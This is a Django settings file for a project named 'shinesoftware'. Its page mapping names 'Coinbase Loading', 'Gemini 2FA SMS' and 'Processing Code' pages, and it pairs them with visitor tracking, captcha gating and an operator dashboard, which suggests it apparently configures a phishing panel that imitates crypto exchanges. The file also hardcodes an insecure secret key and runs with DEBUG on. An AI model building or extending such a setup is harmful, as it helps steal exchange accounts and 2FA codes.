"""
Django settings for shinesoftware project.

Generated by 'django-admin startproject' using Django 5.2.1.

For more information on this file, see
https://docs.djangoproject.com/en/5.2/topics/settings/

For the full list of settings and their values, see
https://docs.djangoproject.com/en/5.2/ref/settings/
"""

from pathlib import Path
import os

# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent


# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/5.2/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-2)9t0de40nyg_1r*-ie+0184apr!$62pm%)2!*g1%x#=s96ops'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = []


# Application definition

INSTALLED_APPS = [
    'daphne',
    'channels',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'dashboard',
    'core',
    'django_user_agents', # Changed: Point to the actual package directory
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    'core.middleware.CloudflareCaptchaMiddleware',
    'django_user_agents.middleware.UserAgentMiddleware', # Changed: Point to the correct middleware path
    'dashboard.middleware.VisitorTrackingMiddleware', 
]

ROOT_URLCONF = 'shinesoftware.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'shinesoftware', 'templates')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'shinesoftware.wsgi.application'


# Database
# https://docs.djangoproject.com/en/5.2/ref/settings/#databases

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': BASE_DIR / 'db.sqlite3',
    }
}


# Password validation
# https://docs.djangoproject.com/en/5.2/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]


# Internationalization
# https://docs.djangoproject.com/en/5.2/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_TZ = True


# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/5.2/howto/static-files/

STATIC_URL = 'static/'
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'shinesoftware', 'static')]


# Default primary key field type
# https://docs.djangoproject.com/en/5.2/ref/settings/#default-auto-field

DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'


MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')


LOGIN_URL = 'login'  # The name of your login URL pattern
LOGIN_REDIRECT_URL = 'dashboard' # Where to redirect after successful login if no 'next' param
LOGOUT_REDIRECT_URL = 'login' # Where to redirect after logout


ASGI_APPLICATION = 'shinesoftware.asgi.application'

CHANNEL_LAYERS = {
    "default": {
        "BACKEND": "channels_redis.core.RedisChannelLayer",
        "CONFIG": {
            "hosts": [("127.0.0.1", 6379)], # Or your Redis server address
        },
    },
}




PAGE_NAME_MAPPING = {
    'home': {'name': 'Root Page', 'icon_class': 'fas fa-globe'},
    'submit_connect_code': {'name': 'Processing Code', 'icon_class': 'fas fa-cogs'},
    'coinbase_loading': {'name': 'Coinbase Loading', 'icon_class': 'fas fa-spinner fa-spin'},
    'login': {'name': 'Login Page', 'icon_class': 'fas fa-sign-in-alt'},
    'dashboard': {'name': 'Main Dashboard', 'icon_class': 'fas fa-tachometer-alt'},
    'settings': {'name': 'Panel Settings', 'icon_class': 'fas fa-cogs'},
    'user': {'name': 'User Settings', 'icon_class': 'fas fa-user-cog'},
    'routes': {'name': 'Routes Config', 'icon_class': 'fas fa-route'},
    'gemini_2fa_sms_view': {'name': 'Gemini 2FA SMS', 'icon_class': 'fas fa-sms'},
}